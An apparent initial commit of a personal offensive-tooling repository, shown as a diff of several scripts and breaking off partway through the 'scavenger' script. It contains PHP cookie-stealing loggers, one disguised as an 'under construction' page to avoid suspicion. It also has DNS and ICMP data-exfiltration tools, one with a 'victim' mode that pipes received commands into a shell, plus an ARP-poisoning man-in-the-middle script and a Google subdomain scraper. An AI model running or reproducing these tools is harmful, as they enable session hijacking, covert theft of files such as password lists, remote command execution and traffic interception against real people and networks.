init

Author: ghost-ng

AdvCGrab.php

@@ -0,0 +1,43 @@
+<?php
+function GetIP()
+{
+ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
+  $ip = getenv("HTTP_CLIENT_IP");
+ else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
+  $ip = getenv("HTTP_X_FORWARDED_FOR");
+ else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
+  $ip = getenv("REMOTE_ADDR");
+ else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
+  $ip = $_SERVER['REMOTE_ADDR'];
+ else
+  $ip = "unknown";
+ return($ip);
+}
+
+function logData()
+{
+ $ipLog="logadv.txt";
+ $cookie = $_SERVER["sign"];
+ $register_globals = (bool) ini_get('register_gobals');
+ if ($register_globals) $ip = getenv('REMOTE_ADDR');
+ else $ip = GetIP();
+
+ $rem_port = $_SERVER['REMOTE_PORT'];
+ $user_agent = $_SERVER['HTTP_USER_AGENT'];
+ $rqst_method = $_SERVER['METHOD'];
+ $rem_host = $_SERVER['REMOTE_HOST'];
+ $referer = $_SERVER['HTTP_REFERER'];
+ $date=date ("l dS of F Y h:i:s A");
+ $log=fopen("$ipLog", "a+");
+
+ if (preg_match("/bhtmb/i", $ipLog) || preg_match("/bhtmlb/i", $ipLog))
+  fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br-->");
+ else
+  fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \r\n ");
+ fclose($log);
+}
+
+logData();
+echo '<center><p>Page Under Construction</p></center>'
+// this part is displayed if the page is visited directly, in order to avoid any suspicion...
+?>

CurlST.sh

@@ -0,0 +1,16 @@
+#accepted input - curl_server.sh DOMAIN or curl_server.sh FILE OUTPUT_FILE
+#DO NOT ENTER OUTPUT_FILE ARGUMENT IF NOT INPUTTING A FILE
+input="$1"
+output="$2"
+if [[ -f "${input}" ]]
+then
+	#echo "this is a file"
+	while read -r domain || [[ -n "$domain" ]]; do
+	#curl -sD - -o /dev/null -A "Mozilla/4.0" http://$domain/ | tr -d '\r'| sed -e '/Server/p' -e '/Location/!d' | paste - -
+	server_type=$(curl -m 10 -sD - -o /dev/null -A "Mozilla/4.0" http://$domain/ | tr -d '\r'| sed -e '/Server/!d')
+	echo -e "$domain $server_type" >> $output
+	done < "$input"
+else
+#echo "This is not a file"
+curl -sD - -o /dev/null -A "Mozilla/4.0" http://$input/ | tr -d '\r'| sed -e '/Server/p' -e '/Location/!d' | paste - - -d " "
+fi

EasyCGrab.php

@@ -0,0 +1,6 @@
+<?php
+    $cookie = $_GET["sign"];
+    $steal = fopen("log.txt", "a+");
+    fwrite($steal, $cookie . "\n");
+    fclose($steal);
+?>

RandFileGen.py

@@ -0,0 +1,73 @@
+import string
+import random
+import os.path
+
+def get_file_amt():
+    global num_files
+    print("**Try a small amount of files to learn the script's behavior first**")
+    num_files = input("# of files to create=")
+    num_files = int(num_files)
+        
+def get_wkdir():
+    global wkdir
+    print("What directory would you like the files to be created in?") 
+    print("**Example:")
+    print("**C:\\Users\\username\\Documents\\ for Windows or /root/home/username/ for linux based OS")
+    print("**")
+    print("**If you don't add a slash as the last character then the prgm will interpret the characters as the filename.")
+
+    wkdir = input()
+    if os.path.isdir(wkdir) is False:
+        print("Invalid Path Name.  Check path and try again")
+        get_wkdir()
+    pass
+    
+def create_files(filename, size, extension):
+    try:
+        file = open(filename, "wb")
+        file.write(b"\0" * size)
+        file.close()
+    except IOError:
+        print("I/O Error. Check permissions or path and try again")
+        print("Ensure the directory ends with '/' or '\'")
+        main()
+
+def gen_random_type(size, chars):
+    return ''.join(random.choice(chars) for x in range(size))
+
+def gen_random_size(min_file_size, max_file_size):
+    return random.randint(min_file_size, max_file_size) 
+
+def gen_random_filename(wkdir, count, extension):
+    seq = (wkdir, str(count) , ".", extension)
+    filename = ''.join(seq)
+    return filename
+
+def main():
+    count = 1
+    get_file_amt()
+    get_wkdir()
+    filename = ""
+    
+    while count <= num_files:
+        extension = gen_random_type(3, string.ascii_lowercase)
+        size = gen_random_size(min_file_size, max_file_size)
+        filename = gen_random_filename(wkdir, count, extension)
+        create_files(filename, size, extension)
+        count = count + 1
+     
+    print(count-1, "Files created")
+    exit()
+    
+#START
+global min_file_size
+global max_file_size
+
+min_file_size = input("Lower limit(KB)=")
+max_file_size = input("Upper limit(KB)=")
+min_file_size = 1024 * int(min_file_size)
+max_file_size = 1024 * int(max_file_size)
+
+#min_file_size = 1024 #in bytes
+#max_file_size = 5024 #in bytes
+main()

browsable.sh

@@ -0,0 +1,13 @@
+#work in progress
+#this script turns an smb created file into a file that can be browsed
+#when a file is created on a mac or windows it does not associated the 
+#correct permissions and therfore does not add the correct www-data
+#group permissions
+#
+#input=owner of file
+owner1="$1"
+owner2="$2"
+owner3="$3"
+sudo chown -R $owner1:www-data /home/$owner1/
+sudo chown -R $owner2:www-data /home/$owner2/
+sudo chown -R $owner2:www-data /home/$owner3/

dns-rx.sh (depricated)

@@ -0,0 +1,15 @@
+#!/bin/bash
+#$1 - listening interface
+#$2 - save-as file
+#$3 - host that will be transmitting file
+#$4 - domain to extract
+while true; do
+	if tcpdump -i eth0 port 53 and host $3 -l -n -s 0 -w - | tee temp1.pcap | grep -m 1 --line-buffered EOF; then
+	 echo "EOF reached"
+	 tcpdump port 53 and host $3 -n -r temp1.pcap | grep $4 | cut -d ' ' -f 8 | cut -d '.' -f 1 | uniq | sed -e 's/\(EOF\)*$//g' > ./.temp2
+	 break
+	fi
+done
+base64 -d ./.temp2 > $2
+rm ./.temp2
+rm ./temp1.pcap

dns-tx.sh (depricated)

@@ -0,0 +1,10 @@
+#$1 - the input plain text file
+#$2 - the destination server IP
+#$3 - the FQDN 
+#$4 - time out (sec) between lookups
+base64 -w 63 $1 > ./.temp1
+echo 'EOF' >> ./.temp1
+while IFS= read -r line || [ -n "$line" ]; do
+	dig +time=$4 @$2 $line.$3;
+done < ./.temp1
+rm ./.temp1

gcurl

@@ -0,0 +1,119 @@
+#!/bin/bash
+OPTIND=1
+function cleanup {
+echo
+echo "All URLs are in '$domainURLs'"
+echo "All unique (sub)domains are in '$domainsubdomains'"
+echo
+echo "have a nice day"
+exit
+}
+function gcurl {
+if [[ "$arg" != *-f* ]] || [[ "$arg" != *-d* ]] || [[ "$arg" != *-s* ]] || [[ "$arg" != *-p* ]] || [[ "$arg" != *-r* ]] || [[ "$arg" != *-u* ]] || [[ "$arg" != *-t* ]]; then
+                echo "Not enough flags/switches"
+                echo "Run the -h command to view the help file"
+                echo "Required flags: f,d,s,p,r,u,t"
+                exit
+else
+	count=$((count*10))
+	total_pages=$((total_pages*10))
+	while [ $count -lt $total_pages ]; do
+		if [[ $arg == *"-v"* ]]; then
+			echo "curl -A \"$useragent\" -skLm 10 \"https://www.google.com/search?tbs=li:1&q=allinurl:+-www+site:$domain&start=$count\""
+		fi
+		curl -A "Mozilla/5.0" -skLm 10 "https://www.google.com/search?tbs=li:1&q=allinurl:+-www+site:$domain&start=$count" | grep -oP '\/url\?q=.+?&amp' | sed 's|/url?q=||; s|&amp||' >> $domainURLs
+		sleep $delay
+		count=$((count+10))
+	done
+	sed -i '/webcache.googleusercontent.com/d' $domainURLs
+	cat "$domainURLs" | cut -d/ -f3 | sort | uniq > "$domainsubdomains"
+	echo "Clear screen and show domains? (y/n)"; read -n 1 answer
+	if [[ "$answer" == "y" ]]; then
+		clear
+		cat $domainsubdomains
+	fi
+	cleanup
+fi
+}
+function helpmenu {
+echo "********************GCURL********************
+Usage: gcurl [options...]
+Options:
+ -h     This help mess.
+ -f     Save-As file.
+ -d     Domain to crawl for unique subdomains.
+ -s     Starting search page (0 for 1st page).
+ -p     Amount of Google search result pages (10 results per page).
+ -r     Rolling file to store URLs.  Used to increase potential results over.
+        a series of gcurl executions or can be used to resume searching after.
+        previous results.  Must know final search page to be completely effective.
+  -u     Define a user agent string.  Maybe Mozilla/5.0? ('-' for Mozilla/4.0 default)
+ -t     Timeout (sec) for a delay between gcurl searches.
+ -v     Verbose mode.  Shows amount of arguments and what they were.  Not much
+        here.
+*********************************************
+"
+exit
+}
+function versioninfo {
+echo "
+*****************gcurl*****************
+gcurl is a tool that automates google searches and returns
+a list of all subdomains within the search.  It is used to
+determine which subdomains are readily visibly by search engines
+like google and can also be used to find public facing assets
+of a given domain (that google has indexed).
+
+gcurl v1.0.0 Copyright (C) 2015
+This program comes with ABSOLUTELY NO WARRANTY;
+This is free software, and you are welcome to redistribute it
+under certain conditions
+Last Updated: 11/20/2015
+"
+exit
+}
+arg="$*"
+NUMARGS="$#"
+if [[ $arg == *"-v"* ]]; then
+        echo "Number of arguments: $NUMARGS"
+        echo "Arguments entered: $arg"
+fi
+#if you cannot have multiple flags at once use below
+#if [[ "$*" == *"-r"* ]] && [[ "$*" == *"-t"* ]]; then
+#       echo "
+#       =======================================================================
+#       ERROR: You can only select -t OR -r NOT both, that wouldn't make sense.
+#       ======================================================================="
+#       echo "Try -h for the help menu"
+#       exit
+#fi
+#if you need to declare flag arguments, use below
+if [ $NUMARGS -eq 0 ]; then
+        helpmenu
+fi
+#use a colon after the flag that requires an argument
+while getopts "hf:r:d:p:s:u:t:v" option;
+do
+        case $option in
+        h|\?) helpmenu; exit;;
+		v)	if [[ $arg == "-v" ]]; then
+				versioninfo
+				exit
+			fi;;
+        f) domainsubdomains="$OPTARG";;
+        r) domainURLs="$OPTARG";;
+        d) domain="$OPTARG";;
+        p) total_pages="$OPTARG";;
+        d) domain="$OPTARG";;
+        p) total_pages="$OPTARG";;
+        s) count="$OPTARG";;
+        u)      if [[ "$OPTARG" = "-" ]]; then
+                useragent="Mozilla/4.0"
+                else
+                useragent="$OPTARG"
+                fi;;
+        t) delay="$OPTARG";;
+        esac
+done
+shift $((OPTIND-1))
+gcurl

google_curl.sh-1.0 (depricated)

@@ -0,0 +1,34 @@
+#!/bin/bash
+#This script will take 1 argument if needed [timeout] between google searches
+#to potentially avoid rate limiting
+timeout=$1
+total_pages=0
+count=0
+domain=""
+echo "What domain would you like to expand?"
+read domain
+echo "THIS SCRIPT WILL COMPOUND ON ANY PREVIOUS $domain-URLs.txt FILE"
+echo "TO MAXIMIZE THE POOL OF SUBDOMAIN RESULTS THAT COULD BE FOUND"
+echo "Enter the starting page (0 for 1st page)"
+read count
+count=$((count*10))
+echo "How many search result pages?"
+echo "(last search page; 10 results per page)"
+read total_pages
+total_pages=$((total_pages*10))
+while [ $count -lt $total_pages ]; do
+        echo "https://www.google.com/search?tbs=li:1&q=allinurl:+-www+site:$domain&start=$count"
+        curl -A "Mozilla/5.0" -skLm 10 "https://www.google.com/search?tbs=li:1&q=allinurl:+-www+site:$domain&start=$count" | grep -oP '\/url\?q=.+?&amp' | sed 's|/url?q=||; s|&amp||' >> $domain-URLs.txt
+sed -i '/webcache.googleusercontent.com/d' $domain-URLs.txt
+        if [[ $timeout != "" ]]; then
+        sleep $timeout
+        fi
+count=$((count+10))
+done
+cat $domain-URLs.txt | cut -d/ -f3 | sort | uniq > $domain-subdomains.txt
+echo
+cat $domain-subdomains.txt
+echo
+echo "All URLs found are in $domain-URLs.txt"
+echo "All unique (sub)domains are in $domain-subdomains.txt"
+echo "have a nice day"

iHide

@@ -0,0 +1,216 @@
+#!/bin/bash
+OPTIND=1
+function cleanup {
+rm /tmp/temp -f
+kill -2 $(ps aux | grep hping3 | grep -v "grep hping3" | awk '{print $2}') > /dev/null
+exit
+}
+function icmpreceive {
+if [[ "$arg" != *-e* ]] || [[ "$arg" != *-s* ]] || [[ "$arg" != *-g* ]] || [[ "$arg" != *-i* ]] || [[ "$arg" != *-f* ]] || [[ "$arg" != *-r* ]]; then
+                echo "Not enough flags/switches"
+                echo "Run the -h command to view the help file"
+                echo "Required flags: e,s,g,i,f,r"
+                exit
+        else
+			hping3 $sflag --listen $signature -I $iface > /tmp/temp &
+			if tail -f -n 1 -c 5 /tmp/temp | grep -m 1 -o --line-buffered $eof; then
+			#kill -2 $(ps aux | grep hping3 | grep -v "grep hping3" | awk '{print $2}') > /dev/null
+			base64 -d /tmp/temp > $file
+			#cp /tmp/temp $file 
+			sed -i "s/[\x0].*//g" $file; sed -i "/$eof.*/q" $file;  sed -i "/$eof/d" $file
+			cleanup
+			fi
+fi
+}
+function icmptransfer {
+if [[ "$arg" != *-d* ]] || [[ "$arg" != *-s* ]] || [[ "$arg" != *-f* ]] || [[ "$arg" != *-z* ]] || [[ "$arg" != *-c* ]] || [[ "$arg" != *-t* ]]; then
+                echo "Not enough flags/switches"
+                echo "Run the -h command to view the help file"
+                echo "Required flags: d,s,f,z,c,t"
+                exit
+        else
+			eof_string=$(cat /dev/urandom | tr -dc '_A-Z-a-z-0-9' | head -c 8)
+			echo "EOF String: $eof_string  ; use with the -e flag w/receiver"
+			echo -n "Press any key to continue..."
+			read
+			base64 -w 60 $file > /tmp/temp
+			#cp $file /tmp/temp -f
+			echo $eof_string >> /tmp/temp
+			echo "Transferring data.  The receiver script will exit when finished."
+				if hping3 $dflag --icmp --sign $sflag --file /tmp/temp -d $size -u -C $code 2>&1 | grep -q -o --line-buffered -m 1 EOF; then
+				echo EOF Reached
+				cleanup
+				fi
+fi
+}
+function icmpcontrol {
+if [[ "$arg" != *-i* ]] || [[ "$arg" != *-j* ]] || [[ "$arg" != *-s* ]] || [[ "$arg" != *-d* ]] || [[ "$arg" != *-g* ]] || [[ "$arg" != *-c* ]] || [[ "$arg" != *-k* ]]; then
+	echo "Not enough flags/switches"
+	echo "Run the -h command to view the help file"
+	echo "Required flags: i,j,s,d,g,c,k"
+	exit
+else
+	hping3 -I $iface --listen $control_signature & hping3 $sflag --icmp --sign $signature --file ${VAR:-/dev/stdin} -d $dflag -C $code
+fi
+}
+function icmpvictim {
+if [[ "$arg" != *-i* ]] || [[ "$arg" != *-j* ]] || [[ "$arg" != *-s* ]] || [[ "$arg" != *-d* ]] || [[ "$arg" != *-g* ]] || [[ "$arg" != *-c* ]] || [[ "$arg" != *-m* ]]; then
+	echo "Not enough flags/switches"
+	echo "Run the -h command to view the help file"
+	echo "Required flags: i,j,s,d,g,c,m"
+	exit
+else
+	if [[ $background == true ]]; then
+		(hping3 -I $iface --listen $signature | /bin/bash 2>&1 | hping3 $sflag --icmp --sign $control_signature --file ${VAR:-/dev/stdin} -d $dflag -C $code &)
+	else
+		hping3 -I $iface --listen $signature | /bin/bash 2>&1 | hping3 $sflag --icmp --sign $control_signature --file ${VAR:-/dev/stdin} -d $dflag -C $code
+	fi
+fi
+}
+function helpmenu {
+echo "
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++iHide: ICMP File Transfer and Receiving++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+-h  -----  This help mess
+-l  -----  List the ICMP Types
+-v  -----  version/about
+-a  -----  auto cleanup
+*************Transmit Options*************
+-d  -----  Destination server IP
+-s  -----  Data stream signature
+-f  -----  Input file to send
+-z  -----  Data frame size
+-c  -----  ICMP code
+-t  -----  Transfer mode
+*************Receive Options*************
+-e  -----  EOF string, retrieved from transfer script
+-s  -----  The sender IP
+-g  -----  The transmitted data's signature
+-i  -----  Listening interface
+-f  -----  The filename to save the file as
+-r  -----  Receive mode
+**********Terminal Mode Options**********
+**************Experimental***************
+-i  -----  listening interface
+-j  -----  signature on controller
+-s  -----  IP of controller; IP of victim with -k flag
+-d  -----  data field size
+-g  -----  victim machine signature
+-c  -----  ICMP code
+-m  -----  This is the victim machine
+-k  -----  This is the controller (C2 Authority)
+**************Experimental***************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Examples:
+----|Transfer|----
+Required flags: d,s,f,z,c,t
+iHide -d 10.0.1.4 -s sign -f ./passwds -z 48 -c 11 -t
+----|Receiver (On 8.8.8.8 machine from previous ex.)|----
+Required flags: e,s,g,i,f,r
+iHide -e [eof string] -s 10.0.1.7 -g sign -i eth0 -f saveas.txt -r
+Note1: Prior to sending the traffic, you must have a receiver setup on the destination server
+to catch the ICMP packets.
+Note2: You may need to preceed the scripts with sudo.
+Note3: Use the generated string in the transfer script with the -e flag in the receiver script
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
+}
+function icmptypes {
+echo "
+ICMP TYPE NUMBERS
+The Internet Control Message Protocol (ICMP) has many messages that
+are identified by a "type" field.
+    Type 0 — Echo Reply
+    Type 1 — Unassigned
+    Type 2 — Unassigned
+    Type 3 — Destination Unreachable
+    Type 4 — Source Quench (Deprecated)
+    Type 5 — Redirect
+    Type 6 — Alternate Host Address (Deprecated)
+    Type 7 — Unassigned
+    Type 8 — Echo
+    Type 9 — Router Advertisement
+    Type 10 — Router Selection
+    Type 11 — Time Exceeded
+    Type 12 — Parameter Problem
+    Type 13 — Timestamp
+    Type 14 — Timestamp Reply
+    Type 15 — Information Request (Deprecated)
+    Type 16 — Information Reply (Deprecated)
+    Type 17 — Address Mask Request (Deprecated)
+    Type 18 — Address Mask Reply (Deprecated)
+    Type 19 — Reserved (for Security)
+    Types 20-29 — Reserved (for Robustness Experiment)
+    Type 30 — Traceroute (Deprecated)
+    Type 31 — Datagram Conversion Error (Deprecated)
+    Type 32 — Mobile Host Redirect (Deprecated)
+    Type 33 — IPv6 Where-Are-You (Deprecated)
+    Type 34 — IPv6 I-Am-Here (Deprecated)
+    Type 35 — Mobile Registration Request (Deprecated)
+    Type 36 — Mobile Registration Reply (Deprecated)
+    Types 37 — Domain Name Request (Deprecated)
+    Types 38 — Domain Name Reply (Deprecated)
+    Type 39 — SKIP (Deprecated)
+    Type 40 — Photuris
+    Type 41 — ICMP messages utilized by experimental mobility protocols such as Seamoby
+    Types 42-252 — Unassigned
+    Type 253 — RFC3692-style Experiment 1
+    Type 254 — RFC3692-style Experiment 2"
+ exit
+}
+function versioninfo {
+echo "
+*****************Scavenger*****************
+iHide is a script that leverages the optional data field to 
+transmit contents via the ICMP protocol.
+iHide v0.9.0 Copyright (C) 2015 
+This program comes with ABSOLUTELY NO WARRANTY;
+This is free software, and you are welcome to redistribute it
+under certain conditions
+Last Updated: 10/24/2015
+"
+exit
+}
+arg="$*"
+NUMARGS="$#"
+if [[ "$*" == *"-r"* ]] && [[ "$*" == *"-t"* ]] || [[ "$*" == *"-k"* ]] && [[ "$*" == *"-m"* ]]; then
+	echo "
+	=======================================================================
+	   ERROR: You can only select -t OR -r OR -k OR -m NOT a combination.
+	======================================================================="
+	echo "Try -h for the help menu"
+	exit
+fi
+if [ $NUMARGS -eq 0 ]; then
+  helpmenu
+fi
+while getopts "hvld:s:j:f:c:e:z:g:i:btrkm" option;
+do
+	case $option in	
+	h|\?) helpmenu
+	exit;;
+	a) cleanup;;
+	l) icmptypes;;
+    f)  if [[ "$OPTARG" = "-" ]]; then
+			file="${VAR:-/dev/stdin}"
+			stdin="true"
+			else
+			file="$OPTARG"
+		fi;;
+	d) dflag="$OPTARG";;
+	c) code="$OPTARG";;
+	j) control_signature="$OPTARG";;
+	g) signature="$OPTARG";;
+	s) sflag="$OPTARG";;
+	i) iface="$OPTARG";;
+	e) eof="$OPTARG";;
+	v) versioninfo;;
+	z) size="$OPTARG";;
+	b) background=true;;
+	t) icmptransfer;;
+	r) icmpreceive;;
+	k) icmpcontrol;;
+	m) icmpvictim;;
+	esac
+done
+shift $((OPTIND-1))

icmp-rx.sh (depricated)

@@ -0,0 +1,27 @@
+#!/bin/bash
+#use the '-h' option to view the help (syntax) file
+#Usage: hping3 [sender ip] --listen [signature] -I [interface] > [file]
+while getopts h option
+do
+        case "${option}"
+        in
+                h) echo "
+#-h - this help mess
+#\$1 - sending IP
+#\$2 - signature
+#\$3 - interface
+#\$4 - plain text file to save as
+#Usage: hping3 [sender ip] --listen [signature] -I [interface] > [file]
+"
+exit;;
+        esac
+done
+hping3 $1 --listen $2 -I $3 > ./.temp1
+trap " " INT
+echo "passed trap"
+#cut -f1 -d '=' ./.temp1 | tr -d '\n' > ./.temp2
+#echo -n '==' | cat ./.temp2 - > ./exfil.base64
+#base64 -d ./exfil.base64 > $4
+#rm ./.temp2 & rm ./.temp1
+mv ./.temp1 ./$4
+rm ./.temp1

icmp-tx.sh (depricated)

@@ -0,0 +1,71 @@
+#!/bin/bash
+#use the '-h' option to view the help (syntax) file
+#Option -C 11 is ttl exceeded preventing a reply
+#Usage: hping3 [dest ip] [signature] [tx file] [data frame size] [icmp type]
+while getopts hc option
+do
+        case "${option}"
+        in
+                h) echo "
+#-b - base64 encode file (makes the file significantly bigger, taking much longer to transmit)
+#-h - this help mess
+#-c - display a list of ICMP codes
+#\$1 - destination IP
+#\$2 - signature
+#\$3 - plain text file
+#\$4 - data frame size (try 100)
+#\$5 - icmp type (try 11 - ttl exceeded)
+#Usage: hping3 [dest ip] [signature] [tx file] [data frame size] [icmp type]
+"
+exit;;
+                c) echo "
+ICMP TYPE NUMBERS
+
+The Internet Control Message Protocol (ICMP) has many messages that
+are identified by a "type" field.
+
+Type    Name                                    Reference
+----    -------------------------               ---------
+  0     Echo Reply                               [RFC792]
+  1     Unassigned                                  [JBP]
+  2     Unassigned                                  [JBP]
+  3     Destination Unreachable                  [RFC792]
+  4     Source Quench                            [RFC792]
+  5     Redirect                                 [RFC792]
+  6     Alternate Host Address                      [JBP]
+  7     Unassigned                                  [JBP]
+  8     Echo                                     [RFC792]
+  9     Router Advertisement                    [RFC1256]
+ 10     Router Selection                        [RFC1256]
+ 11     Time Exceeded                            [RFC792]
+ 12     Parameter Problem                        [RFC792]
+ 13     Timestamp                                [RFC792]
+ 14     Timestamp Reply                          [RFC792]
+ 15     Information Request                      [RFC792]
+ 16     Information Reply                        [RFC792]
+ 17     Address Mask Request                     [RFC950]
+ 18     Address Mask Reply                       [RFC950]
+ 19     Reserved (for Security)                    [Solo]
+ 20-29  Reserved (for Robustness Experiment)        [ZSu]
+ 30     Traceroute                              [RFC1393]
+ 31     Datagram Conversion Error               [RFC1475]
+ 32     Mobile Host Redirect              [David Johnson]
+ 33     IPv6 Where-Are-You                 [Bill Simpson]
+ 34     IPv6 I-Am-Here                     [Bill Simpson]
+ 35     Mobile Registration Request        [Bill Simpson]
+ 36     Mobile Registration Reply          [Bill Simpson]
+ 37     Domain Name Request                     [Simpson]
+ 38     Domain Name Reply                       [Simpson]
+ 39     SKIP                                    [Markson]
+ 40     Photuris                                [Simpson]"
+exit;;
+esac
+done
+#base64 -w 0 $3 > ./.target;;
+while true; do
+        if hping3 $1 --icmp --sign $2 --file $3 -d $4 -u -C $5 2>&1 | grep -q --line-buffered -m 1 EOF; then
+         echo "EOF Reached"
+         exit
+        fi
+done
+rm ./.target

mitm.py

@@ -0,0 +1,64 @@
+#Created by - unknown
+from scapy.all import *
+import sys
+import os
+import time
+
+try:
+	interface = raw_input("[*] Enter Desired Interface: ")
+	victimIP = raw_input("[*] Enter Victim IP: ")
+	gateIP = raw_input("[*] Enter Router IP: ")
+except KeyboardInterrupt:
+	print "\n[*] User Requested Shutdown"
+	print "[*] Exiting..."
+	sys.exit(1)
+
+print "\n[*] Enabling IP Forwarding...\n"
+os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
+
+def get_mac(IP):
+	conf.verb = 0
+	ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1)
+	for snd,rcv in ans:
+		return rcv.sprintf(r"%Ether.src%")
+
+def reARP():
+	
+	print "\n[*] Restoring Targets..."
+	victimMAC = get_mac(victimIP)
+	gateMAC = get_mac(gateIP)
+	send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7)
+	send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7)
+	print "[*] Disabling IP Forwarding..."
+	os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
+	print "[*] Shutting Down..."
+	sys.exit(1)
+
+def trick(gm, vm):
+	send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm))
+	send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm))
+
+def mitm():
+	try:
+		victimMAC = get_mac(victimIP)
+	except Exception:
+		os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")		
+		print "[!] Couldn't Find Victim MAC Address"
+		print "[!] Exiting..."
+		sys.exit(1)
+	try:
+		gateMAC = get_mac(gateIP)
+	except Exception:
+		os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")		
+		print "[!] Couldn't Find Gateway MAC Address"
+		print "[!] Exiting..."
+		sys.exit(1)
+	print "[*] Poisoning Targets..."	
+	while 1:
+		try:
+			trick(gateMAC, victimMAC)
+			time.sleep(1.5)
+		except KeyboardInterrupt:
+			reARP()
+			break
+mitm()

rfiles.py

@@ -0,0 +1,9 @@
+import stringimport randomimport os.path
+def get_file_amt():    global num_files    print("**Try a small amount of files to learn the script's behavior first**")    num_files = input("# of files to create=")    num_files = int(num_files)        def get_wkdir():    global wkdir    print("What directory would you like the files to be created in?")     print("**Example:")    print("**C:\\Users\\username\\Documents\\ for Windows or /root/home/username/ for linux based OS")    print("**")    print("**If you don't add a slash as the last character then the prgm will interpret the characters as the filename.")
+    wkdir = input()    if os.path.isdir(wkdir) is False:        print("Invalid Path Name.  Check path and try again")        get_wkdir()    pass    def create_files(filename, size, extension):    try:        file = open(filename, "wb")        file.write(b"\0" * size)        file.close()    except IOError:        print("I/O Error. Check permissions or path and try again")        print("Ensure the directory ends with '/' or '\'")        main()
+def gen_random_type(size, chars):    return ''.join(random.choice(chars) for x in range(size))
+def gen_random_size(min_file_size, max_file_size):    return random.randint(min_file_size, max_file_size) 
+def gen_random_filename(wkdir, count, extension):    seq = (wkdir, str(count) , ".", extension)    filename = ''.join(seq)    return filename
+def main():    count = 1    get_file_amt()    get_wkdir()    filename = ""        while count <= num_files:        extension = gen_random_type(3, string.ascii_lowercase)        size = gen_random_size(min_file_size, max_file_size)        filename = gen_random_filename(wkdir, count, extension)        create_files(filename, size, extension)        count = count + 1         print(count-1, "Files created")    exit()    #STARTglobal min_file_sizeglobal max_file_size
+min_file_size = input("Lower limit(KB)=")max_file_size = input("Upper limit(KB)=")min_file_size = 1024 * int(min_file_size)max_file_size = 1024 * int(max_file_size)
+#min_file_size = 1024 #in bytes#max_file_size = 5024 #in bytesmain()

scavenger

@@ -0,0 +1,195 @@
+#!/bin/bash
+OPTIND=1
+function cleanup {
+clear
+sleep 4
+if [[ $arg != *"-v"* ]]; then
+	echo "Cleaning up this mess..."
+	rm -f ./.temp2
+	rm -f ./temp1.pcap
+	rm -f ./.temp1
+	rm -f ./pcap
+	clear
+else
+	echo "Leaving a mess (verbose)..."
+	echo "Clean it up before you run the file again --- ls -al"
+	echo ""
+fi
+exit
+}
+function timecount {
+if [[ $stdin == "true" ]]; then
+        tput cup 0 0
+        echo "Unable to estimate stream completion time... "
+else
+declare -i size=$(du -b $file | cut -f1)
+declare -i num=$(expr $size \* 2 \* 2 / 96)     #2 secs per 96 byte query, * 2 queries
+#declare -i sec=$(expr $size % 60)
+#declare -i min=$(expr $totalsec / 60)
+
+declare -i min=0
+declare -i hour=0
+declare -i day=0
+    if((num>59));then
+        ((sec=num%60))
+        ((num=num/60))
+        if((num>59));then
+            ((min=num%60))
+            ((num=num/60))
+            if((num>23));then
+                ((hour=num%24))
+                ((day=num/24))
+            else
+                ((hour=num))
+            fi
+        else
+            ((min=num))
+        fi
+    else
+        ((sec=num))
+    fi
+    tput cup 0 0
+    echo -ne "Current Date & Time: $(date)  Est. Completion Time in: "
+    echo "$day"d "$hour"h "$min"m "$sec"s
+fi
+}
+function dnstransfer {
+        if [[ "$arg" != *-f* ]] || [[ "$arg" != *-q* ]] || [[ "$arg" != *-s* ]] || [[ "$arg" != *-d* ]]; then
+                echo "Not enough flags/switches"
+                echo "Run the -h command to view the help file"
+                echo "Required flags: f,d,q,s,t"
+                exit
+        else
+	clear
+        base64 -w 63 $file > ./.temp1
+        echo 'EOF' >> ./.temp1		#comment this out if you do not want to add the EOF line; use Ctrl-C to exit receiver loop
+        sed -i 's/+/?/g' ./.temp1
+	clear;timecount &
+	while IFS= read -r line || [ -n "$line" ]; do
+	trap "break;cleanup" 1 2
+	tput cup 1 0
+	dig +tries=2 +time=$timeout @$serverip $line.$domain
+	done < ./.temp1
+        fi
+cleanup
+exit
+}
+function dnsreceive {
+        if [[ "$arg" != *-i* ]] || [[ "$arg" != *-f* ]] || [[ "$arg" != *-p* ]] || [[ "$arg" != *-d* ]]; then
+                echo "Not enough flags/switches"
+                echo "Required flags: i,f,p,d,r"
+                echo "Run the -h command to view the help file"
+                exit
+        else
+                echo "Press CTRL-C when EOF reached"
+                echo "Starting the packet capture...scanning for EOF marker"
+                echo ""; echo "Your file will be located here: ./"$file""; echo "";
+                tcpdump -i $iface port 53 and host $host -l -n -s 0 > ./pcap &
+                while true; do
+                        if tail -f -n 1 pcap | grep -m 1 --line-buffered EOF; then
+                                kill -2 $(ps aux | grep tcpdump | grep -v "grep tcpdump" | awk '{print $2}') > /dev/null
+                                echo "EOF reached...starting cleanup!"
+                                sleep 3
